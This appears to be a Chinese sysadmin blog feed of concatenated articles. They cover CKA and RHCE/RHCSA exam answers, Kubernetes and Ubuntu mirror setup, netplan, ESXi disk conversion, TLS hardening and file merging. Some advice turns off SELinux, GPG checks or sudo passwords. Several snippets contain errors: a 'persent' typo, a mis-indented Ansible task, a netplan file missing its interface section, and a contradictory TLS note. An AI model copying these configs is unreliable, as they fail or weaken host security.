注意，只能curl通svc的80端口，pod 是无法ping通的

]]> kubernetes CKA CKA K8s service CKA 模拟题库 | 3. 网络策略 NetworkPolicy /archives/kubernetes/CKA/NetworkPolicy.html 模拟题目

设置配置环境：

kubectl config use-context hk8s

Task

在现有的 namespace my-app 中创建一个名为 allow-port-from-namespace 的新 NetworkPolicy
确保新的 NetworkPolicy 允许 namespace echo 中的 Pods 连接到 namespace my-app 中的Pods的9000 端口。
进一步确保新的 NetworkPolicy ：
不允许对没有在监听端口9000的Pods的访问
不允许非来自 namespace echo中的Pods的访问

双重否定就是肯定，所以最后两句话的意思就是：仅允许端口为 9000 的 pod 访问。仅允许 echo 命名空间中的 pod 访问。

参考

https://kubernetes.io/zh-cn/docs/concepts/services-networking/network-policies/
概念 –> 服务负载均衡和联网 –> 网络策略

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

# 查看 命名空间的 标签
kubectl get ns --show-labels

# 如果访问者的namespace没有标签label，则需要手动打一个。如果有一个独特的标签label，则也可以直接使用
kubectl label ns echo project=echo


vim networkpolicy.yaml

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy

metadata:
   name: allow-port-from-namespace # 题目指定的名字
   namespace: my-app  # 被访问者命名空间

spec:
  podSelector:
    matchLabels: {}  # 这两行必须写,也可写成   podSelector: {}

  policyTypes:
  - Ingress   # 策略影响入栈流量
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          project: echo #访问者的命名空间标签 
      ports:
        - protocol: TCP
          port: 9000 # 被访问者的 端口

kubectl apply -f networkpolicy.yaml

检查

kubectl describe networkpolicy -n my-app

]]> kubernetes CKA CKA K8s NetworkPolicy CKA 模拟题库 | 2. 查看pod的CPU /archives/kubernetes/CKA/top.html 模拟题目

设置配置环境：
kubectl config use-context k8s

Task

通过 pod label name=cpu-loader，找到运行时占用大量 CPU 的 pod ，并将占用 CPU 最高的 pod 名称写入文件 /opt/KUTR000401/KUTR00401.txt (已存在)

参考

kubectl top -h
kubectl top pod -h
https://kubernetes.io/docs/reference/kubectl/cheatsheet/#interacting-with-running-pods

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

kubectl top pod -l name=cpu-loader --sort-by cpu -A 
echo "查出来的Pod Name" > /opt/KUTR000401/KUTR00401.txt

检查

cat /opt/KUTR000401/KUTR00401.txt

top-0

]]> kubernetes CKA CKA K8s top cpu-loader KA 模拟题库 | 1. 权限控制RBAC /archives/kubernetes/CKA/rbac.html 设置配置环境

kubectl config use-context k8s

Context

为部署流水线创建一个新的 ClusterRole 并将其绑定到范围为特定的 namespace 的特定 ServiceAccount 。

Task

创建一个名为 deployment-clusterrole 且仅允许创建以下资源类型的新 ClusterRole ：

Deployment
StatefulSet
DaemonSet

在现有的 namespace app-team1 中创建一个名为 cicd-token 的新 ServiceAccount。限于 namespace app-team1 中，将新的 ClusterRole deployment-clusterrole 绑定到新的 ServiceAccount cicd-token

参考

kubectl create clusterrole -h
kubectl create rolebinding -h
https://kubernetes.io/zh-cn/docs/reference/access-authn-authz/rbac/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

kubectl config use-context k8s

# 创建clusterrole
kubectl create clusterrole deployment-clusterrole --verb=create --resource=deployments,statefulsets,daemonsets

# 创建 sc cicd-token
kubectl -n app-team1 create serviceaccount cicd-token

# 创建 rolebinding
# 题目中写了“限于namespace app-team1中”，则创建rolebinding。没有写的话，则创建clusterrolebinding
kubectl -n app-team1 create rolebinding cicd-token-rolebinding --clusterrole=deployment-clusterrole --serviceaccount=app-team1:cicd-token
# rolebinding后面的名字cicd-token-rolebinding随便起的，因为题目中没有要求，如果题目中有要求，就不能随便起了

检查（考试时，可以不检查的）

kubectl -n app-team1 describe rolebinding cicd-token-rolebinding
kubectl auth can-i create deployment --as system:serviceaccount:app-team1:cicd-token
kubectl auth can-i create deployment -n app-team1 --as system:serviceaccount:app-team1:cicd-token

rbac-0

]]> kubernetes CKA CKA K8s RBAC Hands-Free AG Audio 与 Stereo区别 /archives/tools/hands-free-stereo.html 蓝牙耳机接入电脑后会有两个播放设备

Hands-Free AG Audio (双向,单声道,低音质) 语音通话选择
Stereo (单向,双声道,立体声,音质好,清晰) 听音乐首选

hands-free-stereo-0

Hands-Free AG Audio 与 Stereo 的主要区别

特征	Hands-Free AG Audio	Stereo
音频通道	单声道（Mono）	双声道（Stereo，左右声道）
主要用途	语音通话、免提通话	音乐播放、电影观看、高质量音频内容
音质	较低，优化语音通话质量	高质量，适合多媒体播放和高保真音频体验
带宽要求	低带宽，适用于低延迟通话	高带宽，适用于高质量音频传输
延迟	低延迟，适合实时语音通话	可能有轻微延迟，适合非实时音频播放
应用场景	蓝牙耳机、车载蓝牙、免提设备	蓝牙耳机、无线音响、家庭影院、音响系统

Hands-Free AG Audio 模式详解

Hands-Free AG Audio 是指在蓝牙设备中使用的一种音频模式，通常与蓝牙耳机和免提设备相关。AG（Audio Gateway）是指蓝牙设备中的音频网关部分，通常用于连接与处理音频流的数据。

特点

免提功能：AG 音频通常用于支持免提电话通话的设备（如蓝牙耳机或车载蓝牙系统）。在这种模式下，音频流经由设备传输，可以用于接听电话而无需手持设备。
单声道音频：在 Hands-Free AG Audio 模式下，音频一般是单声道的，因为其主要用途是通话而不是音乐或高质量音频播放。单声道意味着所有声音信号都被混合在一个音轨中。
低延迟和低带宽：为了确保电话通话的质量，Hands-Free AG Audio 通常会优先考虑低延迟和低带宽，以减少通话中的声音延迟和音质损失。

应用场景

蓝牙耳机：特别是那些支持通话的蓝牙耳机。
车载蓝牙系统：支持免提功能的车载音响系统。
电话会议设备：支持通过蓝牙进行免提通话的设备。

优点

适用于语音通话等低带宽应用。
支持免提操作，适合需要解放双手的场景。

缺点

仅支持单声道音频，音质和立体感较差。
通常只用于语音通话，无法提供高质量的音频体验。

Stereo 模式详解

Stereo （立体声）是指一种音频格式，用于传递两声道音频（左声道和右声道）。这种模式能够提供更丰富的音频体验，特别是在音乐播放中，能够创建深度和空间感。

Stereo特点

双声道音频：Stereo 音频采用两声道（左声道和右声道），使得音频更加丰富和自然，尤其是在播放音乐、电影或其他高质量音频内容时。
高音质：相比 Hands-Free AG Audio，Stereo 能提供更高的音质，因为它支持更高的带宽，能够传输更多的音频细节。
适合多媒体内容：Stereo 模式不仅适用于语音通话，还适用于音乐播放、视频观看等多媒体内容，能够提供更沉浸的音效体验。

Stereo应用场景

音乐播放：绝大多数蓝牙耳机、无线音响和有线耳机都支持 Stereo 模式，尤其是在听音乐时。
电视和电影：许多音响系统和耳机在观看电影或电视时支持 Stereo 音效。
高质量音频播放设备：如高端蓝牙耳机、家庭影院音响等，通常支持 Stereo。

Stereo优点

提供更丰富、更自然的音质，尤其适合音乐和多媒体内容。
支持左右声道分离，提供更好的空间感和沉浸感。

Stereo缺点

需要更多的带宽和资源，可能导致功耗较高，尤其是在无线设备中。
对比 Hands-Free AG Audio，延迟可能较大，因此不适用于低延迟的语音通话场景。

]]> tools ESXI7磁盘格式区别及厚置备精简置备互转 /archives/linux/esxi7-vmdk-thin-thick.html 1. 精简置备(thin)

无论磁盘分配多大,存储大小为实际占用大小,对于IO频繁的应用会导致性能下降

2. 厚置备延迟置零(默认)

默认创建格式,预先分配空间,有写操作才按需要将其置零

3. 厚置备(thick)

分配号空间并进行置零操作,有IO操作时无需等待直接执行

转换之前关闭虚拟机

一. 精简置备转厚置备

找到对应的虚拟磁盘,然后右键 “扩充磁盘”

esxi7-vmdk-thin-flat-0

二. 厚置备转精简置备

1. 通过vCenter迁移或者克隆虚拟机新的虚拟机磁盘格式为精简置备

2. 通过命令进行转换

注意: 对应目录下有两个vmdk的文件一个是NAME.vmdk 一个是NAME-flat.vmdk, 需要操作的是NAME.vmdk

vmkfstools -i 源磁盘文件名.vmdk  -d thin 目标文件名.vmdk

3. 虚拟机 “取消注册”

esxi7-vmdk-thin-flat-1

4. 修改对应的vmx文件

esxi7-vmdk-thin-flat-2

除vmdk后缀文件外的其他文件,建议全部移动到新建bak文件夹

5. 重新注册虚拟机

开启Esxi7 ssh

依次点击”管理” -> “服务” -> 搜索”TSM” -> 启动 “TSM” 和 “TSM-ssh”

esxi7-vmdk-thin-flat-3

]]> linux esxi7 thin thick 安装 growpart 扩容工具 /archives/linux/install-growpart.html growpart 扩容工具可以进行热扩容，不需要重启服务器

安装

debian/ubuntu
apt-get install cloud-guest-utils
CentOS
yum install cloud-utils-growpart

如果提示没有，可以使用搜索命令搜索

搜索

Debian／Ubuntu
apt search growpart

install-growpart-0

CentOS
yum search growpart

install-growpart-1

其他参考链接 https://support.huaweicloud.com/usermanual-evs/evs_01_0006.html

]]> linux growpart resize2fs /dev/sdb1升级提示 Bad magic number in super-block while trying to open /dev/sdb1 /archives/linux/resize2fs-bad-magic-number.html 使用 growpart 扩容后，执行

resize2fs /dev/sdb1

报错 实际情况中可能需要根据自己的实际路径修改 /dev/sdb1 /dev/sdb2 或者类似lvm路径

resize2fs: Bad magic number in super-block while trying to open /dev/sdb1
Couldn't find valid filesystem superblock

原因是：分区格式非 ext3 ext4 ，可能是 xfs 或者其他

使用 mount 查看对应的分区格式

mount | grep /dev/sdb1

如果分区是 xfs ，则需要使用下面命令进行扩容

xfs_growfs /dev/sdb1

如果没有出错则扩容成功

]]> linux resize2fs xfs_growfs 添加kubernetes(k8s) 国内源 /archives/linux/add-kubernetes-repo.html 参考：

阿里云: https://developer.aliyun.com/mirror/kubernetes
清华： https://mirrors.tuna.tsinghua.edu.cn/help/kubernetes/
官方主页： https://kubernetes.io/

新版 kubernetes 源使用方法和之前有一定区别，请求按照如下配置方法配置使用。

其中新版 kubernetes 源按照安装版本区分不同仓库，该文档示例为配置 1.31 版本，如需其他版本请在对应位置字符串替换即可。

（比如需要安装 1.29 版本，则需要将如下配置中的 v1.31 替换成 v1.29）

（目前该源支持 v1.24 - v1.31 版本，后续版本会持续更新）

Debian / Ubuntu

apt-get update && apt-get install -y apt-transport-https
curl -fsSL https://mirrors.aliyun.com/kubernetes-new/core/stable/v1.31/deb/Release.key |
    gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
echo "deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://mirrors.aliyun.com/kubernetes-new/core/stable/v1.31/deb/ /" |
    tee /etc/apt/sources.list.d/kubernetes.list
apt-get update
apt-get install -y kubelet kubeadm kubectl

CentOS / RHEL / Fedora

cat <<EOF | tee /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://mirrors.aliyun.com/kubernetes-new/core/stable/v1.31/rpm/
enabled=1
gpgcheck=1
gpgkey=https://mirrors.aliyun.com/kubernetes-new/core/stable/v1.31/rpm/repodata/repomd.xml.key
EOF
setenforce 0
yum install -y kubelet kubeadm kubectl
systemctl enable kubelet && systemctl start kubelet

ps: 由于官网未开放同步方式, 可能会有索引gpg检查失败的情况, 这时请用 yum install -y --nogpgcheck kubelet kubeadm kubectl 安装

]]> linux kubernetes国内源 aliyun Ubuntu 设置IP/添加多IP /archives/linux/ubuntu-multi-ip.html ubuntu新的网络配置使用netplan

网络配置文件路径

/etc/netplan/

配置文件

sudo vim /etc/netplan/00-installer-config.yaml

设置IP或者添加多IP，在addresses 下添加即可

network:
  ens160: ## 这个根据实际网卡名填写, 'ip a' 可以查看网络情况
    addresses:
    - 172.20.20.6/24
    - 192.168.13.6/16 ## 根据实际情况填写，单IP 则不用填写这一行
    gateway4: 172.20.20.1 ## 第一个IP地址的网关，第二个IP地址的网关不用写
    nameservers:
      addresses:
      - 222.172.200.68
      search:
      - 223.5.5.5
　　  ##　根据自己的实际情况填写DNS
  version: 2

ubuntu-multi-ip-0

多IP多网段多路由

network:
  ens160: ## 这个根据实际网卡名填写, 'ip a' 可以查看网络情况
    addresses:
    - 172.20.20.6/24
    - 192.168.13.6/16 ## 根据实际情况填写，单IP 则不用填写这一行
    routes:　## 配置多路由
    - to: 0.0.0.0/0
      via: 172.20.20.1
      metric: 100  ## 优先级别
    - to: 0.0.0.0/0
      via: 192.168.0.1
      metric: 100
    nameservers:
      addresses:
      - 222.172.200.68
      search:
      - 223.5.5.5
　　  ##　根据自己的实际情况填写DNS
  version: 2

重启网络服务

sudo systemctl start systemd-networkd

应用网络设置

sudo netplan apply

查看网络状况

ip a
ifconfig

ubuntu-multi-ip-1

参考：

https://blog.csdn.net/xiaoliang199109/article/details/116376630

]]> linux ubuntu 清华源 /archives/linux/ubuntu-sources_list.html

转载自
清华源

这里以 24.04 举例，详细请查看上面的链接

备份源文件

sudo mv /etc/apt/sources.list /etc/apt/sources.list.bk

编辑 /etc/apt/sources.list

sudo vim /etc/apt/sources.list

编辑 /etc/apt/sources.list.d/ubuntu.sources

sudo vim /etc/apt/sources.list.d/ubuntu.sources

本镜像仅包含 32/64 位 x86 架构处理器的软件包，在 ARM(arm64, armhf)、PowerPC(ppc64el)、RISC-V(riscv64) 和 S390x 等架构的设备上（对应官方源为 ports.ubuntu.com）请使用 ubuntu-ports 镜像

对于 Ubuntu 不再支持的版本，请参考 Ubuntu 旧版本帮助

在 Ubuntu 24.04 之前，Ubuntu 的软件源配置文件使用传统的 One-Line-Style，路径为 /etc/apt/sources.list
从 Ubuntu 24.04 开始，Ubuntu 的软件源配置文件变更为 DEB822 格式，路径为 /etc/apt/sources.list.d/ubuntu.sources

将系统自带的对应文件做个备份，然后根据格式的选择下面对应的内容替换，即可使用选择的软件源镜像。

传统格式 /etc/apt/sources.list

# 默认注释了源码镜像以提高 apt update 速度，如有需要可自行取消注释
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-updates main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-updates main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-backports main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-backports main restricted universe multiverse

# 以下安全更新软件源包含了官方源与镜像站配置，如有需要可自行修改注释切换
deb http://security.ubuntu.com/ubuntu/ noble-security main restricted universe multiverse
# deb-src http://security.ubuntu.com/ubuntu/ noble-security main restricted universe multiverse

# 预发布软件源，不建议启用
# deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-proposed main restricted universe multiverse
# # deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-proposed main restricted universe multiverse

DEB822 格式 /etc/apt/sources.list.d/ubuntu.sources

Types: deb
URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu
Suites: noble noble-updates noble-backports
Components: main restricted universe multiverse
Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg

Types: deb
URIs: http://security.ubuntu.com/ubuntu/
Suites: noble-security
Components: main restricted universe multiverse
Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg

因镜像站同步有延迟，可能会导致生产环境系统不能及时检查、安装上最新的安全更新，不建议替换 security 源。

]]> linux ubuntu 清华源 IIS,Nginx,Apache,Tomcat禁用TLS1.0和TLS1.1协议 /archives/web/disable-tls1.0-tls1.1.html SSL/TLS 的版本

协议	发布时间	状态
SSL 1.0	未公布	已弃用
SSL 2.0	1995 年	已于 2011 年弃用
SSL 3.0	1996 年	已于 2015 年弃用
TLS 1.0	1999 年	计划于 2020 年弃用
TLS 1.1	2008 年	计划于 2020 年弃用
TLS 1.2	2008 年
TLS 1.3	2018 年

Nginx

通常Nginx的conf/nginx.conf配置如下
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
删除TLS1.0 TLSv1.1、增加TLS1.3
ssl_protocols TLSv1.2 TLSv1.3;
重启Nginx使配置生效
nginx -s reload

Apache

通常Apache的配置如下
SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2
1-1. 基于RedHat的发行版（CentOS，Fedora）配置文件 /etc/httpd/conf/httpd.conf 1-2. 基于Debian的发行版（Ubuntu）配置文件 /etc/apache2/sites-enabled/ 目录下
删除+TLSv1 +TLSv1.1、增加TLSv1.3
SSLProtocol -ALL +TLSv1.2 +TLSv1.3
重启Apache使配置生效

基于RedHat的发行版（CentOS，Fedora）

systemctl restart httpd

基于Debian的发行版（Ubuntu）

service apache2 restart

Tomcat

通常Tomcat的conf/server.xml配置如下
SSLProtocol="TLSv1+TLSv1.1+TLSv1.2"
删除+TLSv1 +TLSv1.1、增加TLS1.3
SSLProtocol="TLSv1.2+TLSv1.3"
重启Tomcat使配置生效

关闭tomcat

bin/shutdown.sh

启动tomcat

bin/startup.sh

IIS服务器

IIS服务器需使用官方工具（IISCrypto）进行修改官网 IIS Crypto 下载 IIS Crypto GUI

disable-tls1.0-tls1.1-0

注：表示使用TLS1.2协议连接通过，说明我们已经禁用了TLS1.2

]]> web tls1.0 tls1.1 合并文件 /archives/tools/merged-file.html 好的，以下是整合后的文章草稿，涵盖了普通文件和二进制文件合并的所有方法，重点突出了它们的区别。

1. 合并普通文件

普通文件（如文本文件）合并的方法非常直接。在 Linux 和 Windows 中，你都可以使用简单的命令来实现文件合并。

在 Linux 上合并文件

在 Linux 系统上，最常用的工具来合并普通文件是 cat 命令。cat 命令用于将文件内容输出到终端，同时也可以将多个文件合并并重定向到一个新的文件中。

示例

假设你有两个文件 file1.txt 和 file2.txt，你想将它们合并为一个新的文件 merged.txt，可以使用如下命令：

cat file1.txt file2.txt > merged.txt

如果你希望将多个文件合并并追加到已有的文件中，可以使用 >> 操作符：

cat file1.txt file2.txt >> merged.txt

在 Windows 上合并文件

在 Windows 上，你可以使用 type 命令来合并普通文件。与 Linux 的 cat 命令类似，type 命令会将多个文件的内容按顺序输出。

windows示例

假设有 file1.txt 和 file2.txt 两个文件，合并为 merged.txt，可以使用以下命令：

type file1.txt file2.txt > merged.txt

如果要将多个文件追加到已有文件中，可以使用 >>：

type file1.txt file2.txt >> merged.txt

2. 合并二进制文件

二进制文件（如视频、音频、图片等）与普通文件不同，它们的内容不能像文本文件一样简单地合并。在合并二进制文件时，必须确保文件内容按字节流合并，以避免文件损坏。

在 Linux 上合并二进制文件

在 Linux 上，你可以继续使用 cat 命令来合并二进制文件。尽管 cat 通常用于文本文件，但它会逐字节读取文件，因此也能安全地合并二进制文件。

linux示例

假设你有两个二进制文件 file1.bin 和 file2.bin，你希望将它们合并为一个新的文件 merged.bin，可以使用以下命令：

cat file1.bin file2.bin > merged.bin

这条命令会按字节流将两个文件的内容合并为一个新文件 merged.bin。

在 Windows 上合并二进制文件

在 Windows 上，使用 copy /b 命令来合并二进制文件。/b 参数告诉 copy 命令按二进制方式处理文件，从而保证文件的原始内容不被改变。

windows示例2

假设你有两个二进制文件 file1.bin 和 file2.bin，你可以使用以下命令将它们合并为 merged.bin：

copy /b file1.bin + file2.bin merged.bin

这个命令会将 file1.bin 和 file2.bin 按顺序合并，并创建一个新的文件 merged.bin。注意，/b 参数告诉 copy 命令按二进制方式处理文件。

如果你希望将多个文件合并在一起，可以继续使用 + 连接更多的文件，例如：

copy /b file1.bin + file2.bin + file3.bin merged.bin

在 PowerShell 中合并二进制文件

在 PowerShell 中，你可以使用 [System.IO.File]::ReadAllBytes 和 [System.IO.File]::WriteAllBytes 来合并二进制文件。这样做可以确保跨平台兼容并处理二进制数据。

powershell示例

$file1 = [System.IO.File]::ReadAllBytes("file1.bin")
$file2 = [System.IO.File]::ReadAllBytes("file2.bin")
[System.IO.File]::WriteAllBytes("merged.bin", $file1 + $file2)

这段代码会将 file1.bin 和 file2.bin 按字节流合并，并将结果写入 merged.bin 文件。

3. 普通文件与二进制文件合并的区别

虽然普通文件和二进制文件的合并过程在命令行操作上看起来相似，但它们之间有一些本质的区别，主要体现在合并过程中对数据的处理方式。

普通文件（文本文件）可以直接按字符或行合并，工具如 cat 或 type 命令会逐行读取文件并合并，不会影响文件的内容。
二进制文件（如图片、音频、视频等）必须按字节流合并。对于二进制文件，必须确保文件内容不会被误处理，常用的命令如 copy /b 或 cat（Linux）能够按字节合并文件，而不会修改文件内容。

为什么需要注意二进制文件的合并

在文本文件合并时，每个字符通常都有明确的文本编码，命令行工具在合并时会逐行读取并拼接内容。然而，二进制文件的内容可能包括非打印字符和控制符，这些内容不能简单地视为文本处理。错误的合并方式可能导致文件损坏，甚至导致程序崩溃或无法读取。因此，对于二进制文件，必须使用专门支持二进制流的工具和命令（如 copy /b）来合并文件。

4. 跨平台合并文件

对于需要在不同操作系统之间处理文件合并的情况，使用 Python 脚本是一个很好的选择。Python 提供了跨平台的支持，可以处理文本文件和二进制文件的合并。

使用 Python 合并文件

下面是一个 Python 脚本示例，演示了如何合并二进制文件。无论是在 Linux 还是 Windows 上，Python 都能提供一致的行为。

# Python 3 脚本：合并两个二进制文件
with open("merged.bin", "wb") as output_file:
    with open("file1.bin", "rb") as file1:
        output_file.write(file1.read())
    with open("file2.bin", "rb") as file2:
        output_file.write(file2.read())

这段 Python 脚本会读取 file1.bin 和 file2.bin 的字节内容，并将它们按顺序合并到 merged.bin 文件中。

总结

合并文件在开发、运维及日常工作中是一项常见任务。无论是 普通文件 还是 二进制文件，在 Linux 和 Windows 上都有相应的命令来实现文件合并。对于普通文件，可以直接使用 cat 或 type 命令；对于二进制文件，需要使用 copy /b 或 cat（Linux）来按字节流合并文件。对于跨平台的需求，Python 提供了一种可靠的解决方案，确保合并过程不受操作系统限制。

掌握这些技巧，可以帮助你更高效地处理文件合并任务，确保数据的完整性和正确性。

这篇文章结合了普通文件和二进制文件的合并方法，并对它们的区别做了详细的说明，帮助你在不同操作系统中处理文件合并时更加高效。

]]> tools copy cat type 安装AWCC提示错误1603 错误应用程序名称:svchost.exe_ClipSVC 错误模块名称:pidgenx.dll 异常代码:0xc0000409 /archives/windows/awcc-1603-error.html 都是 KB5013942 惹的祸

笔记本是 Dell G15 ，用的 AWCC (Alienware-Command-Center) 对电脑性能进行管理，在五月更新之前，玩游戏开启 G模式，都正常，在 5月中旬更新完系统补丁后，发现一些奇奇怪怪的问题，

AWCC 更新后无法打开，无法通过 Fn+F9 开启高性能G模式
因为玩游戏不开 G模式，游戏性能会有影响，于是直接重装了系统 windows 1909版本，安装awcc (Alienware-Command-Center-Application) 是正常的，
使用最新 Windows10 安装 AWCC 提示错误1603

首先、确定 AWCC 受新系统影响，

在1909系统上安装了awcc 可以正常使用，
更新系统补丁，不更新awcc 能正常使用，
当更新系统补丁，并且更新awcc后，awcc 无法正常使用
卸载重装 awcc 也无用，依旧提示错误1603
找了dell售后技术，无果，于是乎，只能靠自己了

打开系统的 事件查看器 在应用日志中看到如下错误

错误应用程序名称: svchost.exe_ClipSVC，版本: 10.0.19041.1566，时间戳: 0x1f37eb46
错误模块名称: pidgenx.dll，版本: 10.0.19041.1682，时间戳: 0x3388ed7b
异常代码: 0xc0000409
错误偏移量: 0x00000000000187ea
错误进程 ID: 0x2c8c
错误应用程序启动时间: 0x01d87681dd42bc0a
错误应用程序路径: C:\WINDOWS\System32\svchost.exe
错误模块路径: C:\WINDOWS\system32\pidgenx.dll
报告 ID: 1d8ac81f-e588-4048-b841-e1d6fe1e85da
错误程序包全名: 
错误程序包相对应用程序 ID:

经过查询，发现可能是和补丁KB5013942有关，这个补丁是微软 2022年5月发布，正好和故障时间吻合，

awcc-1603-error-0

于是卸载掉这一个更新，等待系统自动重启之后，重新安装 AWCC 未报错，接着安装 Alienware-OC-Controls , 至此, 恢复正常，又可以愉快的玩游戏了

]]> Windows AWCC 错误1603 KB5013942 parted创建和使用分区 /archives/linux/RHCE/Ansible-parted.html parted创建和使用分区

创建一个名为 /home/student/ansible/partion.yml 的playbook 它将在 所有 受管节点上创建分区：

在 vdb 分区上创建一个 1500M 的主分区，分区号 1 ，格式化为 ext4 , dev 组中主机将分区 永久 挂载到 /data
如果磁盘空间不足，给出提示信息，Could not create partiontion of that size , 并创建 800M 分区
如果 vdb 不存在，给出提示信息， This disk is not exist

提示：模块 block rescue ，parted ，file ，filesystem , mount , debug

Answer：

vim /home/student/ansible/partion.yml

---
- name: create and use parted
  hosts: all 
  tasks:
    - name: create parted
      block:
        - name: create  1500M  partition
          parted: 
            device: /dev/vdb
            number: 1
            state: present
            part_end: 1500MiB
        - name: format fs
          filesystem:
            fstype: ext4
            dev: /dev/vdb1
        - name:
          block:
            - name: create directory
              file: 
                path: /data
                state: directory
            - name: mount
              mount:
                src: /dev/vdb1
                path: /data
                state: mounted
                fstype: ext4
          when: inventory_hostname in groups.dev
      rescue:
        - name: errors
          debug:
            msg: "Could not create partition of that size"
        - name: create 800M partition
            parted:
              device: /dev/vdb
              number: 1
              state: present
              part_end: 800MiB
      when: ansible_devices.vdb is defined

    - name: "error"
      debug: 
        msg: "this disk is not exist"
      when: ansible_devices.vdb is not defined

验证:

ansible all -a 'lsblk'
ansible dev -a 'cat /etc/fstab'

Ansible-parted-0

]]> linux RHCE RHCE parted 使用系统角色selinux /archives/linux/RHCE/Ansible-selinux.html 使用系统角色selinux

使用rhel系统角色 selinux 安装rhel系统角色软件包，并创建符合以下条件的playbook /home/studnet/ansible/selinux.yml

在所有节点上运行，使用 selinux
且配置被管节点的 selinux 为 enforcing

提示： rhel-system-roles

Answer:

yum -y install rhel-system-roles
cp -a /usr/share/ansible/roles/rhel-system-roles.selinux /home/student/ansible/roles/selinux
cp /usr/share/doc/rhel-system-roles/selinux/example-selinux-playbook.yml /home/student/ansible/
mv example-selinux-playbook.yml selinux.yml 
vim selinux.yml

对内容进行删减，留下面即可

---
- hosts: all 
  vars:
    selinux_policy: targeted
    selinux_state: enforcing
  tasks:
    - name: exectue the role and catch errors
      block:
        - include_role:
            name: selinux
      rescue:
        - name: handle errors
          fail:
            msg: "role failed"
          when: not selinux_reboot_required
        - name: restart managed host
          shell: sleep 2 && shutdown -r now "Ansible updates triggered"
          async: 1
          poll: 0
          ignore_errors: true
        - name: wait for mananged host to come back
          wait_for_connection:
            delay: 10 
            timeout: 300
        - name: reapply the role
          include_role:
            name: selinux

ansible-playbook selinux.yml

验证：

ansible all -a 'grep "^SELINUX=" /etc/selinux/config'

Ansible-selinux-0

]]> linux RHCE ansible RHCE selinux cron创建计划任务 /archives/linux/RHCE/Ansible-cron.html 创建计划任务

在 所有主机 上创建一个名为 /home/student/ansible/cron.yml 的playbook，

配置cron任务，每隔 2 分钟运行，并执行以下命令
- logger "ex200 in progress"
以 natasha 身份运行

提示：

模块 user ， cron

Answer：

vim /home/student/ansible/cron.yml

---
- name: cron job
  hosts: all
  tasks:
    - name: create user
      user: 
        name: natasha
        state: persent
    - name: create cron job
      cron:
        name: "job , 2 minute /per"
        minute: '*/2'
        user: natasha
        job: logger "ex200 in progress"

验证：

ansible all -a 'crontab -u natasha -l'

Ansible-cron-0

]]> linux RHCE ansible RHCE cron umask设置用户默认权限 /archives/linux/RHCSA/umask.html umask设置用户权限、

设置 natasha 用户创建的目录权限默认为 733 ，文件权限为 622 ，永久生效

提示： umask #查看当前umask值文件夹及文件权限：

永久生效：

.bashrc 文件
~/.bashrc 当前用户 /etc/bashrc 所有用户

Answer：

echo "umask 044" >> /home/natasha/.bashrc

验证

su - natasha
echo 123 > 123123
ll

umask-0

]]> linux RHCSA umask 创建脚本查找相应文件 /archives/linux/RHCSA/find.html 创建脚本查找相应文件

创建 /usr/local/bin/myresearch 脚本，查找 /usr/ 下所有 小于10M 且具有 修改组ID 权限的文件，将这些文件复制到 /root/myfiles/ 下

提示：

find：
-size [+/-]大小
-a -and  且
-o -or   或
-not     非
-perm 
    -2000 sgid
    -4000 suid

Answer:

vim /usr/local/bin/myresearch

#!/bin/bash
if [ ! -d "/root/myfiles/" ]; then
    mkdir -p /root/myfiles/
fi
find /usr/ -size -10M -a -perm -2000 -exec cp -a {} /root/myfiles/ \;

chmod +x /usr/local/bin/myresearch

bash /usr/local/bin/myresearch

验证：

ll /root/myfiles/

]]> linux RHCSA find 设置用户密码过期时间 /archives/linux/RHCSA/login-defs.html 设置用户密码过期时间

设置密码过期时间为 20 天

Answer：

vim /etc/login.defs

PASS_MAX_DAYS  20 #最大有效期
#PASS_MIN_DAYS  #最小天数
#PASS_MIN_LEN   #最小长度
#PASS_WARN_AGE  #密码到期前告警时间

]]> linux RHCSA login.defs 设置sudo免密操作 /archives/linux/RHCSA/sudo-nopasswd.html 设置sudo免密操作

允许 sysmgrs 组成员执行 sudo 时 不需要密码

Answer：

visudo

%sysmgrs ALL=(ALL) NOPASSWD: ALL

或者

echo "%sysmgrs ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

验证： 创建一个用户，隶属于对应组，然后执行sudo

]]> linux RHCSA sudo nopasswd Linux自动保存Bing每日美图并设为桌面背景 /archives/tools/linux-bingwallpapers.html 主目录新建一个文件夹 BingWallpapers ，存放壁纸

mkdir /root/BingWallpapers

桌面空白处右键 —— 桌面设置 —— 壁纸设置为刚才设置的目录

编写一个脚本文件，存为

/root/bing/bing.sh

#!/bin/bash
sleep 10
url=`curl -s "http://www.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1" |  cut -d '"' -f 18`
bingurl=https://cn.bing.com$url
filename=`date -u +"%Y-%m-%d"`
wget -q $bingurl -O /root/BingWallpapers/$filename.jpg
exit

通过 crontab -e 添加一个任务

@reboot /root/bing/bing.sh

下次开机 10秒后会从bing下载每日美图，并保存文件名为当前日期

